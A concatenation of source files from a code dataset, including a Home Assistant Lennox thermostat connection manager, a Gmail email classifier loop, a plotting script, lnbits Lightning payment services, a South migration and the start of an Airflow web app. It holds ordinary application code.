if lsystem.config_complete() == False:
continue
numZones = len(lsystem.getZoneList())
_LOGGER.debug(
f"__init__:async_setup host [{self._ip_address}] wait for zones system ["
+ lsystem.sysId
+ "] numZone ["
+ str(numZones)
+ "]"
)
if numZones > 0:
systemsWithZones += 1
if got_message == False:
loops += 1
if systemsWithZones < numOfSystems:
raise S30Exception(
"Timeout waiting for configuration data from Lennox - this sometimes happens, the connection will be automatically retried. Consult the readme for more details",
EC_CONFIG_TIMEOUT,
1,
)
async def connect(self):
await self._api.serverConnect()
async def connect_subscribe(self):
await self._api.serverConnect()
for lsystem in self._api.getSystems():
await self._api.subscribe(lsystem)
async def reinitialize_task(self) -> None:
while True:
try:
self.updateState(DS_CONNECTING)
_LOGGER.debug(
f"reinitialize_task host [{self._ip_address}] - trying reconnect"
)
await self.connect_subscribe()
self.updateState(DS_CONNECTED)
break
except S30Exception as e:
_LOGGER.error(
f"reinitialize_task host [{self._ip_address}] {e.as_string()}"
)
if e.error_code == EC_LOGIN:
raise HomeAssistantError(
f"Lennox30 unable to login host [{self._ip_address}] - please check credentials and restart Home Assistant"
)
self.updateState(DS_RETRY_WAIT)
await asyncio.sleep(RETRY_INTERVAL_SECONDS)
_LOGGER.debug(
f"reinitialize_task host [{self._ip_address}] - reconnect successful"
)
asyncio.create_task(self.messagePump_task())
async def event_wait_mp_wakeup(self, timeout: float) -> bool:
# suppress TimeoutError because we'll return False in case of timeout
try:
await asyncio.wait_for(self._mp_wakeup_event.wait(), timeout)
except asyncio.TimeoutError as e:
return False
return self._mp_wakeup_event.is_set()
async def messagePump_task(self) -> None:
await asyncio.sleep(self._poll_interval)
self._reinitialize = False
self._err_cnt = 0
fast_polling: bool = False
fast_polling_cd: int = 0
received = False
while self._reinitialize == False:
try:
received = await self.messagePump()
except Exception as e:
_LOGGER.error(
f"messagePump_task host [{self._ip_address}] unexpected exception:"
+ str(e)
)
if fast_polling == True:
fast_polling_cd = fast_polling_cd - 1
if fast_polling_cd <= 0:
fast_polling = False
if self._shutdown == True:
break
if not received:
if fast_polling == True:
res = await asyncio.sleep(
min(self._fast_poll_interval, self._poll_interval)
)
else:
res = await self.event_wait_mp_wakeup(self._poll_interval)
if res == True:
self._mp_wakeup_event.clear()
fast_polling = True
fast_polling_cd = self._fast_poll_count
if self._shutdown == True:
_LOGGER.debug(
f"messagePump_task host [{self._ip_address}] is exiting to shutdown"
)
return
elif self._reinitialize == True:
self.updateState(DS_DISCONNECTED)
asyncio.create_task(self.reinitialize_task())
_LOGGER.debug(
f"messagePump_task host [{self._ip_address}] is exiting - to enter retries"
)
else:
_LOGGER.debug(
f"messagePump_task host [{self._ip_address}] is exiting - and this should not happen"
)
async def messagePump(self) -> bool:
bErr = False
received = False
try:
_LOGGER.debug(f"messagePump_task host [{self._ip_address}] running")
received = await self._api.messagePump()
self.updateState(DS_CONNECTED)
except S30Exception as e:
self._err_cnt += 1
# This should mean we have been logged out and need to start the login process
if e.error_code == EC_UNAUTHORIZED:
_LOGGER.debug(
f"messagePump_task host [{self._ip_address}] - unauthorized - trying to relogin"
)
self._reinitialize = True
# If it's an HTTP error, we will not log an error, just an info message, unless
# this exceeds the max consecutive error count
elif e.error_code == EC_HTTP_ERR and self._err_cnt < MAX_ERRORS:
_LOGGER.debug(
f"messagePump_task - http error host [{self._ip_address}] {e.as_string()}"
)
# Since the S30 will close connections and kill the subscription periodically, these errors
# are expected. Log as warnings
elif e.error_code == EC_COMMS_ERROR:
_LOGGER.warning(
f"messagePump_task - communication error to host [{self._ip_address}] {e.as_string()}"
)
else:
_LOGGER.warning(
f"messagePump_task - general error host [{self._ip_address}] {e.as_string()}"
)
bErr = True
except Exception as e:
_LOGGER.exception(
f"messagePump_task unexpected exception host [{self._ip_address}]"
)
self._err_cnt += 1
bErr = True
# Keep retrying retrieval until we get this number of errors in a row, at which point we will try to reconnect
if self._err_cnt >= MAX_ERRORS:
_LOGGER.info(
f"messagePump_task encountered [{self._err_cnt}] consecutive errors - reinitializing connection"
)
self._reinitialize = True
if bErr is False:
self._err_cnt = 0
return received
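# --- Debugging sketch (added illustration; hypothetical host and app id) ---
# Manager wraps the same connect -> subscribe -> messagePump loop that the
# underlying lennoxs30api client exposes; for quick local troubleshooting the
# client can be driven directly, relying on library defaults for the options
# Manager normally passes through.
async def debug_poll_once(host: str = "192.168.1.50") -> None:
    api = s30api_async(None, None, "ha_debug_app_id", ip_address=host)
    await api.serverConnect()
    for system in api.getSystems():
        await api.subscribe(system)
    await api.messagePump()   # one retrieve/dispatch cycle
    await api.shutdown()

# asyncio.run(debug_poll_once())  # requires a reachable S30 controller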
| 39.232659
| 270
| 0.617223
|
f5a4accaa2e438696ca90a817c010ee81b29e7fa
| 1,750
|
py
|
Python
|
main.py
|
osilkin98/HappyMail
|
6bc34cd2b35d58757973a267bf01077332770b6d
|
[
"MIT"
] | 1
|
2018-09-20T01:06:11.000Z
|
2018-09-20T01:06:11.000Z
|
main.py
|
osilkin98/HappyMail
|
6bc34cd2b35d58757973a267bf01077332770b6d
|
[
"MIT"
] | null | null | null |
main.py
|
osilkin98/HappyMail
|
6bc34cd2b35d58757973a267bf01077332770b6d
|
[
"MIT"
] | null | null | null |
from src.classifier import EmailClassifier
from src.email_filter import classify_messages, get_email_list
from src.scraper import get_gmail_service
import src.configuration_files.keys as keys
from colorama import Fore
from time import sleep
def run_main_function(sleep_time=60, max_emails=200):
""" This function checks to see if a new message has arrived every (sleep_time) seconds, and if it has, it gets
classified.
:param int sleep_time: Number of seconds to sleep for before checking again
:param int max_emails: Maximum number of emails to look back for
:return: Nothing
"""
classifier = EmailClassifier(model_file=keys.models + '/trained_net.h5')
service = get_gmail_service()
# Initialize the first message ID
first_message_id = None
try:
while True:
# Have it get the email list
messages, first_message_id = get_email_list(service=service,
last_message_id=first_message_id,
max_lookback=max_emails)
# Have the program classify the messages in the inbox
# 'Label_5' is the negative label
classify_messages(negative_label='Label_5', messages=messages,
classifier=classifier, threshold=0.25)
print("first message id: " + first_message_id)
print("Sleeping like a ferret for " + Fore.GREEN + str(sleep_time) + Fore.RESET + " seconds")
# Then have it sleep like a ferret
sleep(sleep_time)
except (KeyboardInterrupt, EOFError) as err:
print("Exiting program")
if __name__ == '__main__':
run_main_function(max_emails=10)
| 38.043478
| 115
| 0.651429
|
06d7bde752486fa316fbabd883cf065b4b6ca286
| 1,589
|
py
|
Python
|
examples/sock/barplot.py
|
iliar-rabet/SDMob
|
14516dece72d57ccf0fcb9c6af17a0bfeeab635f
|
[
"BSD-3-Clause"
] | 1
|
2021-01-21T05:43:32.000Z
|
2021-01-21T05:43:32.000Z
|
examples/sock/barplot.py
|
iliar-rabet/dao-projection
|
e24a00ba29ce92f37bfbcb2595713f2764cd8e9d
|
[
"BSD-3-Clause"
] | null | null | null |
examples/sock/barplot.py
|
iliar-rabet/dao-projection
|
e24a00ba29ce92f37bfbcb2595713f2764cd8e9d
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
# set width of bar
barWidth = 0.025
#fig = plt.subplots(figsize =(12, 8))
# set height of bar
particle_line = [0.566147244933,0.566147244933]
particle_cir = [0.63188589771,0.972161651262]
ukf_line = [0.724651076994, 0.89]
ukf_cir = [0.824651076994, 1.97326041542]
# Set position of bar on X axis
br1 = [0.85, 1.0]
br2 = [x + barWidth for x in br1]
br3 = [x + barWidth for x in br2]
br4 = [x + barWidth for x in br3]
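# four bar series share each x tick, each shifted right by barWidth from the previous one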
colors = iter([plt.cm.tab20(i) for i in range(20)])
next(colors)
next(colors)
next(colors)
plt.grid(color='#95a5a6', linestyle='--', linewidth=1, axis='y', alpha=0.5)
# Make the plot
plt.bar(br1, particle_line, width = barWidth,
edgecolor ='black', label ='Particle Linear', color=[next(colors)])
next(colors)
plt.bar(br2, particle_cir, width = barWidth,
edgecolor ='black', label ='Particle Circle',color=[next(colors)],hatch = 'x')
plt.bar(br3, ukf_line, width = barWidth,
edgecolor ='black', label ='UKF Linear',color=[next(colors)],hatch = '/')
plt.bar(br4, ukf_cir, width = barWidth,
edgecolor ='black', label ='UKF Circle',color=[next(colors)],hatch = '-')
# Adding Xticks
plt.xlabel('Mobile Node Speed (m/s)', fontweight ='bold',fontsize=14)
plt.ylabel('RMSE (m)', fontweight ='bold',fontsize=14)
legend_properties = {'weight':'bold', 'size':'13'}
plt.xticks([0.895,1.045],
['0.5','1.0'],fontsize=14)
plt.yticks(fontsize=15)
plt.legend(prop=legend_properties)
plt.title("SDMob's Accuracy; Data Interval: 1 s,\n Path Loss Variance=0",fontsize=15)
plt.show()
| 26.04918
| 85
| 0.676526
|
3d54e218d8c4df42e79e29235ec26da13c0002cd
| 11,025
|
py
|
Python
|
lnbits/core/services.py
|
pseudozach/lnbits-legend
|
b90eb0a3ba403d60cc151af12ffabb74fd529db0
|
[
"MIT"
] | 76
|
2021-11-02T22:19:59.000Z
|
2022-03-30T18:01:33.000Z
|
lnbits/core/services.py
|
pseudozach/lnbits-legend
|
b90eb0a3ba403d60cc151af12ffabb74fd529db0
|
[
"MIT"
] | 100
|
2021-11-04T16:33:28.000Z
|
2022-03-30T15:03:52.000Z
|
lnbits/core/services.py
|
pseudozach/lnbits-legend
|
b90eb0a3ba403d60cc151af12ffabb74fd529db0
|
[
"MIT"
] | 57
|
2021-11-08T06:43:59.000Z
|
2022-03-31T08:53:16.000Z
|
import asyncio
import json
from binascii import unhexlify
from io import BytesIO
from typing import Dict, Optional, Tuple
from urllib.parse import parse_qs, urlparse
import httpx
from lnurl import LnurlErrorResponse
from lnurl import decode as decode_lnurl # type: ignore
from lnbits import bolt11
from lnbits.db import Connection
from lnbits.helpers import url_for, urlsafe_short_hash
from lnbits.requestvars import g
from lnbits.settings import WALLET
from lnbits.wallets.base import PaymentResponse, PaymentStatus
from . import db
from .crud import (
check_internal,
create_payment,
delete_payment,
get_wallet,
get_wallet_payment,
update_payment_status,
)
try:
from typing import TypedDict # type: ignore
except ImportError: # pragma: nocover
from typing_extensions import TypedDict
class PaymentFailure(Exception):
pass
class InvoiceFailure(Exception):
pass
async def create_invoice(
*,
wallet_id: str,
amount: int, # in satoshis
memo: str,
description_hash: Optional[bytes] = None,
extra: Optional[Dict] = None,
webhook: Optional[str] = None,
conn: Optional[Connection] = None,
) -> Tuple[str, str]:
invoice_memo = None if description_hash else memo
ok, checking_id, payment_request, error_message = await WALLET.create_invoice(
amount=amount, memo=invoice_memo, description_hash=description_hash
)
if not ok:
raise InvoiceFailure(error_message or "Unexpected backend error.")
invoice = bolt11.decode(payment_request)
amount_msat = amount * 1000
await create_payment(
wallet_id=wallet_id,
checking_id=checking_id,
payment_request=payment_request,
payment_hash=invoice.payment_hash,
amount=amount_msat,
memo=memo,
extra=extra,
webhook=webhook,
conn=conn,
)
return invoice.payment_hash, payment_request
async def pay_invoice(
*,
wallet_id: str,
payment_request: str,
max_sat: Optional[int] = None,
extra: Optional[Dict] = None,
description: str = "",
conn: Optional[Connection] = None,
) -> str:
invoice = bolt11.decode(payment_request)
fee_reserve_msat = fee_reserve(invoice.amount_msat)
async with (db.reuse_conn(conn) if conn else db.connect()) as conn:
temp_id = f"temp_{urlsafe_short_hash()}"
internal_id = f"internal_{urlsafe_short_hash()}"
if invoice.amount_msat == 0:
raise ValueError("Amountless invoices not supported.")
if max_sat and invoice.amount_msat > max_sat * 1000:
raise ValueError("Amount in invoice is too high.")
# put all parameters that don't change here
PaymentKwargs = TypedDict(
"PaymentKwargs",
{
"wallet_id": str,
"payment_request": str,
"payment_hash": str,
"amount": int,
"memo": str,
"extra": Optional[Dict],
},
)
payment_kwargs: PaymentKwargs = dict(
wallet_id=wallet_id,
payment_request=payment_request,
payment_hash=invoice.payment_hash,
amount=-invoice.amount_msat,
memo=description or invoice.description or "",
extra=extra,
)
# check_internal() returns the checking_id of the invoice we're waiting for
internal_checking_id = await check_internal(invoice.payment_hash, conn=conn)
if internal_checking_id:
# create a new payment from this wallet
await create_payment(
checking_id=internal_id,
fee=0,
pending=False,
conn=conn,
**payment_kwargs,
)
else:
# create a temporary payment here so we can check if
# the balance is enough in the next step
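        # (the temporary payment also books -fee_reserve_msat as its fee, so the
        # balance check below already accounts for worst-case routing fees)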
await create_payment(
checking_id=temp_id,
fee=-fee_reserve_msat,
conn=conn,
**payment_kwargs,
)
# do the balance check
wallet = await get_wallet(wallet_id, conn=conn)
assert wallet
if wallet.balance_msat < 0:
if not internal_checking_id and wallet.balance_msat > -fee_reserve_msat:
raise PaymentFailure(
f"You must reserve at least 1% ({round(fee_reserve_msat/1000)} sat) to cover potential routing fees."
)
raise PermissionError("Insufficient balance.")
if internal_checking_id:
        # mark the invoice from the other side as not pending anymore
        # so the other side only gets access to the new money once we are sure
        # the payer has enough balance to deduct from
async with db.connect() as conn:
await update_payment_status(
checking_id=internal_checking_id, pending=False, conn=conn
)
# notify receiver asynchronously
from lnbits.tasks import internal_invoice_queue
await internal_invoice_queue.put(internal_checking_id)
else:
# actually pay the external invoice
payment: PaymentResponse = await WALLET.pay_invoice(
payment_request, fee_reserve_msat
)
if payment.checking_id:
async with db.connect() as conn:
await create_payment(
checking_id=payment.checking_id,
fee=payment.fee_msat,
preimage=payment.preimage,
                    pending=payment.ok is None,
conn=conn,
**payment_kwargs,
)
await delete_payment(temp_id, conn=conn)
else:
async with db.connect() as conn:
await delete_payment(temp_id, conn=conn)
raise PaymentFailure(
payment.error_message
or "Payment failed, but backend didn't give us an error message."
)
return invoice.payment_hash
async def redeem_lnurl_withdraw(
wallet_id: str,
lnurl_request: str,
memo: Optional[str] = None,
extra: Optional[Dict] = None,
wait_seconds: int = 0,
conn: Optional[Connection] = None,
) -> None:
if not lnurl_request:
return None
res = {}
async with httpx.AsyncClient() as client:
lnurl = decode_lnurl(lnurl_request)
r = await client.get(str(lnurl))
res = r.json()
try:
_, payment_request = await create_invoice(
wallet_id=wallet_id,
amount=int(res["maxWithdrawable"] / 1000),
memo=memo or res["defaultDescription"] or "",
extra=extra,
conn=conn,
)
    except Exception:
print(
f"failed to create invoice on redeem_lnurl_withdraw from {lnurl}. params: {res}"
)
return None
if wait_seconds:
await asyncio.sleep(wait_seconds)
params = {"k1": res["k1"], "pr": payment_request}
try:
params["balanceNotify"] = url_for(
f"/withdraw/notify/{urlparse(lnurl_request).netloc}",
external=True,
wal=wallet_id,
)
except Exception:
pass
async with httpx.AsyncClient() as client:
try:
await client.get(res["callback"], params=params)
except Exception:
pass
async def perform_lnurlauth(
callback: str, conn: Optional[Connection] = None
) -> Optional[LnurlErrorResponse]:
cb = urlparse(callback)
k1 = unhexlify(parse_qs(cb.query)["k1"][0])
key = g().wallet.lnurlauth_key(cb.netloc)
def int_to_bytes_suitable_der(x: int) -> bytes:
"""for strict DER we need to encode the integer with some quirks"""
b = x.to_bytes((x.bit_length() + 7) // 8, "big")
if len(b) == 0:
# ensure there's at least one byte when the int is zero
return bytes([0])
if b[0] & 0x80 != 0:
# ensure it doesn't start with a 0x80 and so it isn't
# interpreted as a negative number
return bytes([0]) + b
return b
def encode_strict_der(r_int, s_int, order):
# if s > order/2 verification will fail sometimes
# so we must fix it here (see https://github.com/indutny/elliptic/blob/e71b2d9359c5fe9437fbf46f1f05096de447de57/lib/elliptic/ec/index.js#L146-L147)
if s_int > order // 2:
s_int = order - s_int
# now we do the strict DER encoding copied from
# https://github.com/KiriKiri/bip66 (without any checks)
r = int_to_bytes_suitable_der(r_int)
s = int_to_bytes_suitable_der(s_int)
r_len = len(r)
s_len = len(s)
sign_len = 6 + r_len + s_len
signature = BytesIO()
signature.write(0x30.to_bytes(1, "big", signed=False))
signature.write((sign_len - 2).to_bytes(1, "big", signed=False))
signature.write(0x02.to_bytes(1, "big", signed=False))
signature.write(r_len.to_bytes(1, "big", signed=False))
signature.write(r)
signature.write(0x02.to_bytes(1, "big", signed=False))
signature.write(s_len.to_bytes(1, "big", signed=False))
signature.write(s)
return signature.getvalue()
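    # the ecdsa library's sign_digest_deterministic() passes (r, s, order) to sigencode,
    # so the helper above emits strict-DER signature bytes as lnurl-auth verifiers expect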
sig = key.sign_digest_deterministic(k1, sigencode=encode_strict_der)
async with httpx.AsyncClient() as client:
r = await client.get(
callback,
params={
"k1": k1.hex(),
"key": key.verifying_key.to_string("compressed").hex(),
"sig": sig.hex(),
},
)
try:
resp = json.loads(r.text)
if resp["status"] == "OK":
return None
return LnurlErrorResponse(reason=resp["reason"])
except (KeyError, json.decoder.JSONDecodeError):
return LnurlErrorResponse(
reason=r.text[:200] + "..." if len(r.text) > 200 else r.text
)
async def check_invoice_status(
wallet_id: str, payment_hash: str, conn: Optional[Connection] = None
) -> PaymentStatus:
payment = await get_wallet_payment(wallet_id, payment_hash, conn=conn)
if not payment:
return PaymentStatus(None)
status = await WALLET.get_invoice_status(payment.checking_id)
if not payment.pending:
return status
if payment.is_out and status.failed:
print(f" - deleting outgoing failed payment {payment.checking_id}: {status}")
await payment.delete()
elif not status.pending:
print(
f" - marking '{'in' if payment.is_in else 'out'}' {payment.checking_id} as not pending anymore: {status}"
)
await payment.set_pending(status.pending)
return status
# WARN: the same value must be used for the balance check and passed to WALLET.pay_invoice(); using different values may introduce a vulnerability
def fee_reserve(amount_msat: int) -> int:
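    # e.g. a 100 000 sat (100 000 000 msat) payment reserves max(2000, 1 000 000) = 1 000 000 msat;
    # the 2000 msat floor only matters for payments below 200 sat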
return max(2000, int(amount_msat * 0.01))
| 32.331378
| 155
| 0.613515
|
8c6ffad3da94808f92de7f58938db9565c717324
| 5,457
|
py
|
Python
|
src/communities/migrations/0004_auto__add_field_community_is_public.py
|
ofirr/OpenCommunity
|
7786ac2996530af8f545f4398c071793c73634c8
|
[
"BSD-3-Clause"
] | 1
|
2015-05-12T17:59:35.000Z
|
2015-05-12T17:59:35.000Z
|
src/communities/migrations/0004_auto__add_field_community_is_public.py
|
Niros/OpenCommunity
|
4c91136db6243a1cd65b55ecf5a44c2bce24a45a
|
[
"BSD-3-Clause"
] | null | null | null |
src/communities/migrations/0004_auto__add_field_community_is_public.py
|
Niros/OpenCommunity
|
4c91136db6243a1cd65b55ecf5a44c2bce24a45a
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Community.is_public'
db.add_column(u'communities_community', 'is_public',
self.gf('django.db.models.fields.BooleanField')(default=False, db_index=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'Community.is_public'
db.delete_column(u'communities_community', 'is_public')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'communities.community': {
'Meta': {'object_name': 'Community'},
'board_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'uid': ('django.db.models.fields.CharField', [], {'default': "'t8u2cfggsklf588rxjzo11ho'", 'unique': 'True', 'max_length': '24'}),
'upcoming_meeting_comments': ('ocd.base_models.HTMLField', [], {'null': 'True', 'blank': 'True'}),
'upcoming_meeting_guests': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'upcoming_meeting_is_published': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'upcoming_meeting_location': ('django.db.models.fields.CharField', [], {'max_length': '300', 'null': 'True', 'blank': 'True'}),
'upcoming_meeting_participants': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'+'", 'blank': 'True', 'to': u"orm['users.OCUser']"}),
'upcoming_meeting_published_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'upcoming_meeting_scheduled_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'upcoming_meeting_started': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'upcoming_meeting_summary': ('ocd.base_models.HTMLField', [], {'null': 'True', 'blank': 'True'}),
'upcoming_meeting_version': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'users.ocuser': {
'Meta': {'object_name': 'OCUser'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
}
}
complete_apps = ['communities']
| 70.87013
| 197
| 0.584754
|
8839b9355ce7b19065b9bdf6689c2480ccee112b
| 5,143
|
py
|
Python
|
legacy/examples/graphsage/reader.py
|
zbmain/PGL
|
dbded6a1543248b0a33c05eb476ddc513401a774
|
[
"Apache-2.0"
] | 1,389
|
2019-06-11T03:29:20.000Z
|
2022-03-29T18:25:43.000Z
|
legacy/examples/graphsage/reader.py
|
zbmain/PGL
|
dbded6a1543248b0a33c05eb476ddc513401a774
|
[
"Apache-2.0"
] | 232
|
2019-06-21T06:52:10.000Z
|
2022-03-29T08:20:31.000Z
|
legacy/examples/graphsage/reader.py
|
zbmain/PGL
|
dbded6a1543248b0a33c05eb476ddc513401a774
|
[
"Apache-2.0"
] | 229
|
2019-06-20T12:13:58.000Z
|
2022-03-25T12:04:48.000Z
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pickle as pkl
import paddle
import paddle.fluid as fluid
import pgl
import time
from pgl.utils import mp_reader
from pgl.utils.logger import log
import time
import copy
def node_batch_iter(nodes, node_label, batch_size):
"""node_batch_iter
"""
perm = np.arange(len(nodes))
np.random.shuffle(perm)
start = 0
while start < len(nodes):
index = perm[start:start + batch_size]
start += batch_size
yield nodes[index], node_label[index]
def traverse(item):
"""traverse
"""
if isinstance(item, list) or isinstance(item, np.ndarray):
for i in iter(item):
for j in traverse(i):
yield j
else:
yield item
def flat_node_and_edge(nodes):
"""flat_node_and_edge
"""
nodes = list(set(traverse(nodes)))
return nodes
def worker(batch_info, graph, graph_wrapper, samples):
"""Worker
"""
def work():
"""work
"""
_graph_wrapper = copy.copy(graph_wrapper)
_graph_wrapper.node_feat_tensor_dict = {}
for batch_train_samples, batch_train_labels in batch_info:
start_nodes = batch_train_samples
nodes = start_nodes
edges = []
for max_deg in samples:
pred_nodes = graph.sample_predecessor(
start_nodes, max_degree=max_deg)
for dst_node, src_nodes in zip(start_nodes, pred_nodes):
for src_node in src_nodes:
edges.append((src_node, dst_node))
last_nodes = nodes
nodes = [nodes, pred_nodes]
nodes = flat_node_and_edge(nodes)
# Find new nodes
start_nodes = list(set(nodes) - set(last_nodes))
if len(start_nodes) == 0:
break
subgraph = graph.subgraph(
nodes=nodes,
edges=edges,
with_node_feat=False,
with_edge_feat=False)
sub_node_index = subgraph.reindex_from_parrent_nodes(
batch_train_samples)
feed_dict = _graph_wrapper.to_feed(subgraph)
feed_dict["node_label"] = np.expand_dims(
np.array(
batch_train_labels, dtype="int64"), -1)
feed_dict["node_index"] = sub_node_index
feed_dict["parent_node_index"] = np.array(nodes, dtype="int64")
yield feed_dict
return work
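# each worker() call returns a generator factory; multiprocess_graph_reader() below fans
# these out across processes and re-attaches node features in the parent process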
def multiprocess_graph_reader(graph,
graph_wrapper,
samples,
node_index,
batch_size,
node_label,
with_parent_node_index=False,
num_workers=4):
"""multiprocess_graph_reader
"""
def parse_to_subgraph(rd, prefix, node_feat, _with_parent_node_index):
"""parse_to_subgraph
"""
def work():
"""work
"""
for data in rd():
feed_dict = data
for key in node_feat:
feed_dict[prefix + '/node_feat/' + key] = node_feat[key][
feed_dict["parent_node_index"]]
if not _with_parent_node_index:
del feed_dict["parent_node_index"]
yield feed_dict
return work
def reader():
"""reader"""
batch_info = list(
node_batch_iter(
node_index, node_label, batch_size=batch_size))
block_size = int(len(batch_info) / num_workers + 1)
reader_pool = []
for i in range(num_workers):
reader_pool.append(
worker(batch_info[block_size * i:block_size * (i + 1)], graph,
graph_wrapper, samples))
if len(reader_pool) == 1:
r = parse_to_subgraph(reader_pool[0],
repr(graph_wrapper), graph.node_feat,
with_parent_node_index)
else:
multi_process_sample = mp_reader.multiprocess_reader(
reader_pool, use_pipe=True, queue_size=1000)
r = parse_to_subgraph(multi_process_sample,
repr(graph_wrapper), graph.node_feat,
with_parent_node_index)
return paddle.reader.buffered(r, num_workers)
return reader()
| 32.550633
| 78
| 0.564845
|
ba061a263a4b34fc6395f02806c77c4b9504f927
| 1,257
|
py
|
Python
|
SROMPy/target/__init__.py
|
omunroe-com/nasasrompy
|
35ae060b6a032d085a31574fbe3bf390b023631d
|
[
"Apache-2.0"
] | null | null | null |
SROMPy/target/__init__.py
|
omunroe-com/nasasrompy
|
35ae060b6a032d085a31574fbe3bf390b023631d
|
[
"Apache-2.0"
] | null | null | null |
SROMPy/target/__init__.py
|
omunroe-com/nasasrompy
|
35ae060b6a032d085a31574fbe3bf390b023631d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 United States Government as represented by the Administrator of
# the National Aeronautics and Space Administration. No copyright is claimed in
# the United States under Title 17, U.S. Code. All Other Rights Reserved.
# The Stochastic Reduced Order Models with Python (SROMPy) platform is licensed
# under the Apache License, Version 2.0 (the "License"); you may not use this
# file except in compliance with the License. You may obtain a copy of the
# License at http://www.apache.org/licenses/LICENSE-2.0.
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
name="target"
from AnalyticRandomVector import AnalyticRandomVector
from BetaRandomVariable import BetaRandomVariable
from GammaRandomVariable import GammaRandomVariable
from NormalRandomVariable import NormalRandomVariable
from RandomVariable import RandomVariable
from RandomVector import RandomVector
from SampleRandomVector import SampleRandomVector
from UniformRandomVariable import UniformRandomVariable
| 44.892857
| 80
| 0.824185
|
0b71c177ad6160aec2ce234b9b5ce20650ba7d3b
| 5,566
|
py
|
Python
|
airflow/www/app.py
|
maxcountryman/incubator-airflow
|
59e35981905c2c1947782d7a0ec508fd9a329fbe
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
airflow/www/app.py
|
maxcountryman/incubator-airflow
|
59e35981905c2c1947782d7a0ec508fd9a329fbe
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
airflow/www/app.py
|
maxcountryman/incubator-airflow
|
59e35981905c2c1947782d7a0ec508fd9a329fbe
|
[
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import socket
import six
from flask import Flask
from flask_admin import Admin, base
from flask_caching import Cache
from flask_wtf.csrf import CSRFProtect
csrf = CSRFProtect()
import airflow
from airflow import configuration as conf
from airflow import models, LoggingMixin
from airflow.settings import Session
